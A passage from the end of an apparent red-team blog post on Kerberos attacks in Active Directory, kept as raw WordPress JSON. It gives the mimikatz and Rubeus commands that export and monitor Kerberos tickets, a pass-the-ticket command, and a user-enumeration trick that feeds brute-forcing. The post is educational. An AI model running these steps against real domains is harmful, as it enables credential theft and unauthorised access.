service used within the machine (web server).<br \/>\nThis can be done via mimikatz <strong>sekurlsa::tickets \/export<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-657\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/43.png\" alt=\"\" width=\"679\" height=\"411\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-657\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/43.png\" alt=\"\" width=\"679\" height=\"411\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/43.png 679w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/43-300x182.png 300w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/noscript><\/p>\n<p>or using <strong>.\\Rubeus.exe monitor \/interval:1<\/strong><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-658\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/44.png\" alt=\"\" width=\"711\" height=\"555\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-658\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/44.png\" alt=\"\" width=\"711\" height=\"555\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/44.png 711w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/44-300x234.png 300w\" sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/noscript><\/p>\n<p>To abuse this you can use <strong>kerberos<span class=\"prism-token token 1 punctuation \">:<\/span><span class=\"prism-token token 2 punctuation \">:<\/span><\/strong><span data-offset-key=\"ea69e07cd45d4197a2c02f798e308103:3\" data-slate-fragment=\"JTdCJTIyb2JqZWN0JTIyJTNBJTIyZG9jdW1lbnQlMjIlMkMlMjJkYXRhJTIyJTNBJTdCJTdEJTJDJTIybm9kZXMlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJibG9jayUyMiUyQyUyMnR5cGUlMjIlM0ElMjJjb2RlJTIyJTJDJTIyaXNWb2lkJTIyJTNBZmFsc2UlMkMlMjJkYXRhJTIyJTNBJTdCJTIyc3ludGF4JTIyJTNBJTIyY3NoYXJwJTIyJTdEJTJDJTIybm9kZXMlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJibG9jayUyMiUyQyUyMnR5cGUlMjIlM0ElMjJjb2RlLWxpbmUlMjIlMkMlMjJpc1ZvaWQlMjIlM0FmYWxzZSUyQyUyMmRhdGElMjIlM0ElN0IlN0QlMkMlMjJub2RlcyUyMiUzQSU1QiU3QiUyMm9iamVjdCUyMiUzQSUyMnRleHQlMjIlMkMlMjJsZWF2ZXMlMjIlM0ElNUIlN0IlMjJvYmplY3QlMjIlM0ElMjJsZWFmJTIyJTJDJTIydGV4dCUyMiUzQSUyMmtlcmJlcm9zJTNBJTNBcHR0JTIyJTJDJTIybWFya3MlMjIlM0ElNUIlNUQlN0QlNUQlN0QlNUQlN0QlNUQlN0QlNUQlN0Q=\"><span class=\"prism-token token 3\"><strong>ptt ticket.kirbi<\/strong> at your attacking machine<br \/>\nSo am using this to try accessing windows 10 machine, this pic show the action before and after passing the ticket.<\/span><\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-659\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-1024x712.png\" alt=\"\" width=\"1024\" height=\"712\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-659\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-1024x712.png\" alt=\"\" width=\"1024\" height=\"712\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-1024x712.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-300x209.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45-768x534.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/45.png 1168w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Constrained_delegation\"><\/span>Constrained delegation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>To be discussed in a separated blog post<\/p>\n<h2><span class=\"ez-toc-section\" id=\"User_enumeration\"><\/span>User enumeration<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>If you tried authenticating using invalid username, Kerberos will kill the process in the preauthentication step and you will get the following error<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-674\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54.png\" alt=\"\" width=\"920\" height=\"193\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-674\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54.png\" alt=\"\" width=\"920\" height=\"193\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54.png 920w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54-300x63.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/54-768x161.png 768w\" sizes=\"auto, (max-width: 920px) 100vw, 920px\" \/><\/noscript><\/p>\n<p>You can depend on that for enumerating domain users without even being part of the domain!<br \/>\nPractically this is very useful in many situations, as all you need is being able to connect to the KDC.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-675\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55.png\" alt=\"\" width=\"868\" height=\"156\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-675\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55.png\" alt=\"\" width=\"868\" height=\"156\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55.png 868w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55-300x54.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/55-768x138.png 768w\" sizes=\"auto, (max-width: 868px) 100vw, 868px\" \/><\/noscript><\/p>\n<p>You can get the valid usernames which would save you tons of rime while bruteforcing services, along with the users with no preauth required.<br \/>\nThat would give you a good foothold in many situations.<\/p>\n<h1><span class=\"ez-toc-section\" id=\"Conclusion\"><\/span>Conclusion<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>Woooo, finally it&#8217;s over.<br \/>\nI supposed to separate this blog into 2 or 3 parts but found out that it may be better to put as much as techniques as I can into a single post in order not to get lost between many parts related to the same topic.<br \/>\nI&#8217;ve discussed how Kerberos works, tried to explain it as much as I can, discussed most of the attacks directly related to Kerberos authentication.<br \/>\nI tried to be straight to the point as much as I can along with illustrating the stuff that was once confusing to me, hopefully, I succeded doing so.<br \/>\nProbably I will continue with this series, so if you guys have any comments or suggestions, or found sth wrong in this blog post (Am sure I missed something around), feel free to reach me at <a href=\"https:\/\/twitter.com\/0x4148\">@0x4148<\/a><br \/>\nTill next time,<br \/>\nAhmed<\/p>\n<h1><span class=\"ez-toc-section\" id=\"References\"><\/span>References<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p><a href=\"https:\/\/docs.microsoft.com\/pt-pt\/previous-versions\/windows\/server\/cc772815(v=ws.10)?redirectedfrom=MSDN\">How the Kerberos Version 5 Authentication Protocol Works<\/a><br \/>\n<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/security\/kerberos\/kerberos-authentication-overview\">Kerberos Authentication Overview<\/a><br \/>\n<a href=\"https:\/\/techcommunity.microsoft.com\/t5\/ask-the-directory-services-team\/kerberos-for-the-busy-admin\/ba-p\/395083\">Kerberos for the Busy Admin<\/a><br \/>\n<a href=\"https:\/\/winprotocoldoc.blob.core.windows.net\/productionwindowsarchives\/MS-SFU\/%5bMS-SFU%5d.pdf\">Kerberos Protocol Extensions: Service for User and Constrained Delegation Protocol<\/a><br \/>\n<a href=\"https:\/\/adsecurity.org\/?page_id=183\">SPNs<\/a><br \/>\n<a href=\"https:\/\/tools.ietf.org\/html\/rfc6806.html\">Kerberos Principal Name Canonicalization and Cross-Realm Referrals<\/a><br \/>\n<a href=\"https:\/\/tools.ietf.org\/html\/rfc4121\">The Kerberos Version 5<\/a><br \/>\n<a href=\"https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf\">Abusing Kerberos<\/a><br \/>\nAnd almost every single blog at <a href=\"https:\/\/posts.specterops.io\">posts.specterops.io<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kerberos authentication is one of the cores of the AD, knowing how it works facilitates the deep understanding of many attacks.<\/p>\n","protected":false},"author":2,"featured_media":472,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[62,61],"tags":[],"class_list":["entry","author-a-sultan","has-excerpt","post-572","post","type-post","status-publish","format-standard","has-post-thumbnail","category-active-directory","category-red-teaming"],"_links":{"self":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/comments?post=572"}],"version-history":[{"count":30,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":685,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/posts\/572\/revisions\/685"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media\/472"}],"wp:attachment":[{"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.redforce.io\/api\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}